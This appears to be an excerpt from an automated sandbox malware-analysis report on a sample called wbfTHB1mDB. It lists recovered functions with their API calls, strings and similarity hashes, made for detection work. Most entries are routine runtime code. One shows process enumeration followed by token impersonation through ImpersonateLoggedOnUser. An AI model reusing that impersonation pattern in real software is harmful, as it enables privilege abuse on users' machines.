Instruction Fuzzy Hash: E3B18C72741B4096EB00DF65E4943ED33A2E74AB88F50C521EE5D17B9ADF38C699C390

Function 00007FF6A7052C7F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A7052CAB
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A7052CB8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A7052CF4

Strings

Negative precision., xrefs: 00007FF6A7052CA4
Number is too big., xrefs: 00007FF6A7052CB1

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
String ID: Negative precision.$Number is too big.
API String ID: 3237623162-3993994484
Opcode ID: 2e590a375d060733ee75977b5fbcb890a63a34b04a77b8ee94e83729f6395454
Instruction ID: 074b119fc53629f1bdf3c7f78e4e7202e11e97e0a340f91e9af71f1c87cf7eb9
Opcode Fuzzy Hash: 2e590a375d060733ee75977b5fbcb890a63a34b04a77b8ee94e83729f6395454
Instruction Fuzzy Hash: DB111FE3C0A1074FFA4A7F70546A2F92B50EF61311FD14D34E2A8C58A3FCAA35264694

Function 00007FF6A7052C9E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6A7052D40: std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A7052D4B

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A7052CAB
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A7052CB8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A7052CF4

Strings

Negative precision., xrefs: 00007FF6A7052CA4
Number is too big., xrefs: 00007FF6A7052CB1

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
String ID: Negative precision.$Number is too big.
API String ID: 3237623162-3993994484
Opcode ID: 30b3e07375628a7fdd50f8a96e8b54408dbdebe0d25ebebc578ccc02e897b34b
Instruction ID: d6995e063ee42283aa778633c4a8b25b138118d77742ecfa6afc6ffd67426cdd
Opcode Fuzzy Hash: 30b3e07375628a7fdd50f8a96e8b54408dbdebe0d25ebebc578ccc02e897b34b
Instruction Fuzzy Hash: 7C01A1E3C0A10B4FFA4A7F70546E1FA2750EF71601FD14D34E658C58A3FCA936164694

Function 00007FF6A7052B4F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A7052B7B
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A7052B88
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A7052BC4

Strings

Negative width., xrefs: 00007FF6A7052B74
Number is too big., xrefs: 00007FF6A7052B81

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
String ID: Negative width.$Number is too big.
API String ID: 3237623162-1861685508
Opcode ID: ab522acd4c4287a77fe2f3903c82615eb3740f229d610c7ff32e5c8d09b42faf
Instruction ID: c2a0763fa7d47fa0c99ea658dd8bb7aafceaadcf09fd3828318d3d9320ca788e
Opcode Fuzzy Hash: ab522acd4c4287a77fe2f3903c82615eb3740f229d610c7ff32e5c8d09b42faf
Instruction Fuzzy Hash: 1D115BE280E2874FF205AF78A51A4BD3E609F45B08F648E35DBA8C2887EC1D70B0D305

Function 00007FF6A7052B6E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6A7052C10: std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A7052C1B

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A7052B7B
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A7052B88
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A7052BC4

Strings

Negative width., xrefs: 00007FF6A7052B74
Number is too big., xrefs: 00007FF6A7052B81

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
String ID: Negative width.$Number is too big.
API String ID: 3237623162-1861685508
Opcode ID: 63d12b850ce4f7623b80e1b60c009f5eeb9bfdff3b4fb586ff0ffa458465622f
Instruction ID: 2ae59f672c45d6463b66721cb617ab0fa1f42f1e9bc3bedf37f2c3b0b64cf87c
Opcode Fuzzy Hash: 63d12b850ce4f7623b80e1b60c009f5eeb9bfdff3b4fb586ff0ffa458465622f
Instruction Fuzzy Hash: DD11FAB280E1874FE205FF78A55A4AD3FA09F45A08F248D75DB98C2887ED5D70B0D745

Function 0000018C89AAF4D8 Relevance: 7.7, APIs: 5, Instructions: 196COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000018C89AAF517
_set_statfp.LIBCMT ref: 0000018C89AAF535
_set_statfp.LIBCMT ref: 0000018C89AAF55E
_set_statfp.LIBCMT ref: 0000018C89AAF79A

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 5459f65f4676636fdc901623b58b7eba5cdeda63d87ce883b5aed9902fe8fe9f
Instruction ID: 6cf24ec27d3b291db134df1ae5ba02ca625095ec8d14630de29333c5f3e492c8
Opcode Fuzzy Hash: 5459f65f4676636fdc901623b58b7eba5cdeda63d87ce883b5aed9902fe8fe9f
Instruction Fuzzy Hash: 7C812936580A844BF77A8F35A8403EEF2E1BB57398F14C321A955265E5DF34CB8987A0

Function 0000018C89AA843C Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,0000018C89A9F8AF,?,?,00000000,0000018C89A9FB4A,?,?,?,?,-2891666E48DAA7FF,0000018C89A9FAD6), ref: 0000018C89AA845B
FlsSetValue.KERNEL32(?,?,?,0000018C89A9F8AF,?,?,00000000,0000018C89A9FB4A,?,?,?,?,-2891666E48DAA7FF,0000018C89A9FAD6), ref: 0000018C89AA847A
FlsSetValue.KERNEL32(?,?,?,0000018C89A9F8AF,?,?,00000000,0000018C89A9FB4A,?,?,?,?,-2891666E48DAA7FF,0000018C89A9FAD6), ref: 0000018C89AA84A2
FlsSetValue.KERNEL32(?,?,?,0000018C89A9F8AF,?,?,00000000,0000018C89A9FB4A,?,?,?,?,-2891666E48DAA7FF,0000018C89A9FAD6), ref: 0000018C89AA84B3
FlsSetValue.KERNEL32(?,?,?,0000018C89A9F8AF,?,?,00000000,0000018C89A9FB4A,?,?,?,?,-2891666E48DAA7FF,0000018C89A9FAD6), ref: 0000018C89AA84C4

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 4ddb93a95bdcb11c83c4eed7ec3d7385d6f51b3df06352f297e06b7489d089d8
Instruction ID: 54e22c3ae19e17d8f4515a1cc081e332cd8fbdaa5646d6a77a07e8e53f1f3050
Opcode Fuzzy Hash: 4ddb93a95bdcb11c83c4eed7ec3d7385d6f51b3df06352f297e06b7489d089d8
Instruction Fuzzy Hash: D311B23078564047FA68933ABA513F9D1D15B863F0F48C335A93A47BE6DF38D60993A0

Function 00007FF6A7060C3C Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6A706003F,?,?,00000000,00007FF6A70602DA,?,?,?,?,?,00007FF6A7060266), ref: 00007FF6A7060C5B
FlsSetValue.KERNEL32(?,?,?,00007FF6A706003F,?,?,00000000,00007FF6A70602DA,?,?,?,?,?,00007FF6A7060266), ref: 00007FF6A7060C7A
FlsSetValue.KERNEL32(?,?,?,00007FF6A706003F,?,?,00000000,00007FF6A70602DA,?,?,?,?,?,00007FF6A7060266), ref: 00007FF6A7060CA2
FlsSetValue.KERNEL32(?,?,?,00007FF6A706003F,?,?,00000000,00007FF6A70602DA,?,?,?,?,?,00007FF6A7060266), ref: 00007FF6A7060CB3
FlsSetValue.KERNEL32(?,?,?,00007FF6A706003F,?,?,00000000,00007FF6A70602DA,?,?,?,?,?,00007FF6A7060266), ref: 00007FF6A7060CC4

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: a81210357f2d12b0dbfe06c4392c56b8a615d5a3cfef92a64af55cf6380a756d
Instruction ID: 2875b4554dfc6c3ff8ff35f613f2917fbc27f9c78cdd978615ab21e1767102ed
Opcode Fuzzy Hash: a81210357f2d12b0dbfe06c4392c56b8a615d5a3cfef92a64af55cf6380a756d
Instruction Fuzzy Hash: 5711B6D0F4F64241FA699F35AEB197961815F543B0F144734E83DCA7CAEEACF6A18600

Function 00007FF6A70502F0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 340COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A70507B6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A70507BC
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A70507C9

Strings

integral cannot be stored in char, xrefs: 00007FF6A70507C2

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
String ID: integral cannot be stored in char
API String ID: 4097890229-960316848
Opcode ID: d3fa661c7909c31f2df10136174ae6b23e08351e8602a3bf3b77da77346b9ec4
Instruction ID: 49172d3aee4bd4b905275e32df96c0d77addf74bd9976cb9313e3ba5fcc2f6f0
Opcode Fuzzy Hash: d3fa661c7909c31f2df10136174ae6b23e08351e8602a3bf3b77da77346b9ec4
Instruction Fuzzy Hash: 51E1BEA2E09B9589EB20CF74E4403FC37B1BB85348F548235DE9D97A99DF78A4A5C700

Function 00007FF6A70515D0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 333COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A7051A76
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A7051A7C
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A7051A89

Strings

integral cannot be stored in char, xrefs: 00007FF6A7051A82

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
String ID: integral cannot be stored in char
API String ID: 4097890229-960316848
Opcode ID: 73f37ea3a65df646b8d9a74c0d95f76a994af0d7590115819a880ecab22728cb
Instruction ID: f3b6570c261bc2b7dd28dd93c1c3b9c539e25fdaab000f31828308f818ea7e63
Opcode Fuzzy Hash: 73f37ea3a65df646b8d9a74c0d95f76a994af0d7590115819a880ecab22728cb
Instruction Fuzzy Hash: 8DE1B0A2E09B8589EB10CFA8E4403FC37B1FB55348F548235DA9ED7A99DF38A595C700

Function 00007FF6A704FC80 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 315COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A70500E9

Strings

integral cannot be stored in char, xrefs: 00007FF6A70500E2

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: integral cannot be stored in char
API String ID: 909987262-960316848
Opcode ID: 798eccc9fbd753bed3f49468c2a2aa55f5ebd2e469281c1ab0b60e4ad41c59eb
Instruction ID: 06c498d7715d0bee5d099626dab3ef04af5d2e1ab032785c8b43f97980064329
Opcode Fuzzy Hash: 798eccc9fbd753bed3f49468c2a2aa55f5ebd2e469281c1ab0b60e4ad41c59eb
Instruction Fuzzy Hash: ABD1BEA2E09B9189EB10CF74E8403FC37A1BB55348F548235DE9DD7A99DF38A5A5D300

Function 0000018C89A56510 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000018C89A56580
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0000018C89A565C8
_Getcoll.LIBCPMT ref: 0000018C89A565FC

Strings

bad locale name, xrefs: 0000018C89A56701

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: std::_$GetcollLocinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1287851536-1405518554
Opcode ID: f7a1d3e9a45845e101cdae0032adcde8655c8f69f93cec81a899d7a13171c9a8
Instruction ID: 8d38c8cdc73c27663a9f9c98334dbe44c7a27d71af88781d3f28ea06c6fe0bde
Opcode Fuzzy Hash: f7a1d3e9a45845e101cdae0032adcde8655c8f69f93cec81a899d7a13171c9a8
Instruction Fuzzy Hash: 3C919F32741B408AFB14DFB5D4503EC33A5EB46B88F04C525EA5D1BB9ADE38C659C394

Function 0000018C89ACD3EC Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000018C89ACD6CB

Part of subcall function 0000018C89ABA7BC: _invalid_parameter_noinfo.LIBCMT ref: 0000018C89ABA7D9

Strings

UTF-8, xrefs: 0000018C89ACD64A
ccs, xrefs: 0000018C89ACD606
UTF-16LEUNICODE, xrefs: 0000018C89ACD669

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: c93d0c80d14289c47e4e012ab7823fd63e1d2ef69c6c82be7162492af36b69b4
Instruction ID: 1d9010ae6b4707a3fbcca88bfefb5989ebe6482d30d7a55fdb5d75a39997a599
Opcode Fuzzy Hash: c93d0c80d14289c47e4e012ab7823fd63e1d2ef69c6c82be7162492af36b69b4
Instruction Fuzzy Hash: 8881BC7268420499FB758F29C2503F83AE0E313F4CF57C005EA065FA95DB39EA4997E1

Function 00007FF6A704E410 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A704E63F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A704E645

Strings

true, xrefs: 00007FF6A704E5D8
false, xrefs: 00007FF6A704E5DF

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: false$true
API String ID: 3668304517-2658103896
Opcode ID: c23aa86301010fbc63903a689a8f217cc4f8b4650af5b1d90549298ac87a62d0
Instruction ID: 30c6278d93b25036a27b8e1ad25ea54cc89ab07c64fa78fc37cf1c9a9ef28abf
Opcode Fuzzy Hash: c23aa86301010fbc63903a689a8f217cc4f8b4650af5b1d90549298ac87a62d0
Instruction Fuzzy Hash: 8761D1A2F0AB8198FB00CFA9D4103FC2361AB947A8F044635DE5DA77D9DE3CE096D204

Function 0000018C89A69E10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

__std_exception_destroy.LIBVCRUNTIME ref: 0000018C89A69FF0
__std_exception_destroy.LIBVCRUNTIME ref: 0000018C89A69FFD

Strings

at line , xrefs: 0000018C89A69E9A
, column , xrefs: 0000018C89A69EC8

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: __std_exception_destroy
String ID: at line $, column
API String ID: 2453523683-191570568
Opcode ID: 8e1d1b64992ebb00d4d77e0a1fed3680f94c34247a39cf19bc8266c22a1fe26b
Instruction ID: 187adbc37e6524be144b79cb2f9c32ac19d2100f764536e69483051f95505de3
Opcode Fuzzy Hash: 8e1d1b64992ebb00d4d77e0a1fed3680f94c34247a39cf19bc8266c22a1fe26b
Instruction Fuzzy Hash: 6B51B172644B8081EB10DF5AE5803EE7761F78ABD4F10C615EBA907B9ADF38C685C790

Function 0000018C89A3C910 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000018C89A3C97F
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0000018C89A3C9C7
_Getctype.LIBCPMT ref: 0000018C89A3CA05

Strings

bad locale name, xrefs: 0000018C89A3CABE

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: std::_$GetctypeLocinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1612978173-1405518554
Opcode ID: 4e377f37bbd5bd997ee2fd56168668ce9c45cc9569bc05fc6928106dbe2a341f
Instruction ID: b9b1f9642daae8c032d33dc6a90b288c8a0080c825a4031079167faeb6881caa
Opcode Fuzzy Hash: 4e377f37bbd5bd997ee2fd56168668ce9c45cc9569bc05fc6928106dbe2a341f
Instruction Fuzzy Hash: 95512832782B409AFB10DFA0D8503ED33B5EB46B48F44C4259E8927A96DF34C669D3A4

Function 0000018C89A90F00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 0000018C89A90F8B

Strings

?, xrefs: 0000018C89A90F40

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Open
String ID: ?
API String ID: 71445658-1684325040
Opcode ID: e858e0353f0b0f51294932793ef27480847be266b4f1ddbad7c6a163f917eadb
Instruction ID: b7d97b74efaa7d02f3e939a2431df777356bd43c3b78a4773528fb54f30ba8ac
Opcode Fuzzy Hash: e858e0353f0b0f51294932793ef27480847be266b4f1ddbad7c6a163f917eadb
Instruction Fuzzy Hash: 9D419372658B8481EB50CB25F4803EEB360F78A7D4F50D215FA9942B99DF7CD298CB90

Function 0000018C89AC9520 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000018C89AC9536
GetProcAddress.KERNEL32 ref: 0000018C89AC9546

Strings

GetTempPath2W, xrefs: 0000018C89AC953C
kernel32.dll, xrefs: 0000018C89AC952F

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetTempPath2W$kernel32.dll
API String ID: 1646373207-1846531799
Opcode ID: 54cfff917e61736e637f3daaf4ede8ca0052c6a8694a4254edfc7bf5cdf1c370
Instruction ID: df88c73265ff5bc8758aee47bddd69f3cba570fcfcc3f2f10bdfd03d585f3ac6
Opcode Fuzzy Hash: 54cfff917e61736e637f3daaf4ede8ca0052c6a8694a4254edfc7bf5cdf1c370
Instruction Fuzzy Hash: 21E01A31340B4982EE099B51F9842ED3361FB8AB85F58D029DD0E07338DE3CC68D8794

Function 0000018C89A7F480 Relevance: 6.5, APIs: 4, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 0000018C89A7ED30: CreateToolhelp32Snapshot.KERNEL32 ref: 0000018C89A7ED86
Part of subcall function 0000018C89A7ED30: Process32FirstW.KERNEL32 ref: 0000018C89A7EDCA
Part of subcall function 0000018C89A7ED30: Process32NextW.KERNEL32 ref: 0000018C89A7EDDF
Part of subcall function 0000018C89A7ED30: OpenProcess.KERNEL32 ref: 0000018C89A7EE1B
Part of subcall function 0000018C89A7ED30: OpenProcessToken.ADVAPI32 ref: 0000018C89A7EE42
Part of subcall function 0000018C89A7ED30: CloseHandle.KERNEL32 ref: 0000018C89A7EFB6
Part of subcall function 0000018C89A7ED30: Process32NextW.KERNEL32 ref: 0000018C89A7EFC3
Part of subcall function 0000018C89A7ED30: CloseHandle.KERNEL32 ref: 0000018C89A7F007

ImpersonateLoggedOnUser.ADVAPI32 ref: 0000018C89A7F4DD
ImpersonateLoggedOnUser.ADVAPI32 ref: 0000018C89A7F9C8
RevertToSelf.ADVAPI32 ref: 0000018C89A7F9E6

Memory Dump Source

Source File: 00000008.00000002.2650265365.0000018C89A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000018C89A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18c89a10000_wbfTHB1mDB.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleImpersonateLoggedNextOpenProcessUser$CreateFirstRevertSelfSnapshotTokenToolhelp32
String ID:
API String ID: 1562318730-0
Opcode ID: 316c2e6fdf35f67638a24c1b45d4b3dc2851aea21892dc61ca1780e4b7a94a99
Instruction ID: c80b75c0623033a5104445b16c2edf57a56dcc3ddc8c4c5df27578c0f948ab08
Opcode Fuzzy Hash: 316c2e6fdf35f67638a24c1b45d4b3dc2851aea21892dc61ca1780e4b7a94a99
Instruction Fuzzy Hash: 6822E17275478496FB00DB78D8553ED2761F7837A8F50D201EAAD06AEADF78C688C390

Function 0000018C89AAA888 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000018C89AAA907
WriteFile.KERNEL32 ref: 0000018C89AAABCF
WriteFile.KERNEL32 ref: 0000018C89AAAC15
GetLastError.KERNEL32 ref: 0000018C89AAACCB

